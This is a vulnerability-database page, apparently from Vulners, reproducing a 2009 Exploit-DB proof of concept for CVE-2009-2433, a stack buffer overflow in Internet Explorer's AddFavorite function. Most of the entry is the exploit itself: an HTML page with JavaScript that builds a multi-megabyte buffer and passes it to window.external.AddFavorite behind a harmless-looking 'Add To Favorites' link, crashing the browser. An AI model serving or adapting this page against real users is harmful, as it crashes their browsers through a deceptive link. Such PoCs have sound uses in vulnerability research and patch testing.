Lucene search
+L

Microsoft Internet Explorer - 'AddFavorite' Remote Crash (PoC)

🗓️ 09 Jul 2009 00:00:00Reported by SberryType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

Stack Buffer Overflow in Internet Explorer 'AddFavorite' Functio

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-2433
9 Jul 200900:00
circl
cve
CVE
CVE-2009-2433
10 Jul 200920:25
cve
cvelist
Cvelist
CVE-2009-2433
10 Jul 200920:25
cvelist
nvd
NVD
CVE-2009-2433
10 Jul 200921:00
nvd
openvas
OpenVAS
Microsoft Internet Explorer Buffer Overflow Vulnerability (Jul 2009)
15 Jul 200900:00
openvas
openvas
OpenVAS
Microsoft Internet Explorer Buffer Overflow Vulnerability - Jul09
15 Jul 200900:00
openvas
prion
Prion
Stack overflow
10 Jul 200921:00
prion
------------------------------------------->
IE Add Favourites Stack Buffer Overflow POC

Sberry, Compaq

------------------------------------------->

<html>
<head>
<script language="JavaScript" type="Text/Javascript">
function go()
{
	var str =unescape('%u4141');
	var finalstr = createInlineBuffer(str, 5150000);
	var len = finalstr.length;
	document.write(len);
	addfav(finalstr);
}

/* Effient in-line creation */
function createInlineBuffer (str, num) {
	var	i = Math.ceil(Math.log(num) / Math.LN2),
		res = str;
	do {
		res += res;
	} while (0 < --i);
	return res.slice(0, str.length * num);
}

/* Vulnerable Function */
function addfav(str)
   {
   if (document.all)
      {
      window.external.AddFavorite
      ('http://'+str,'Crash')
      }
   }
</script>
</head>
<body>
<a href="javascript:go()">Add To Favorites</a>
</body>
</html>

# milw0rm.com [2009-07-09]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Jul 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.1894
38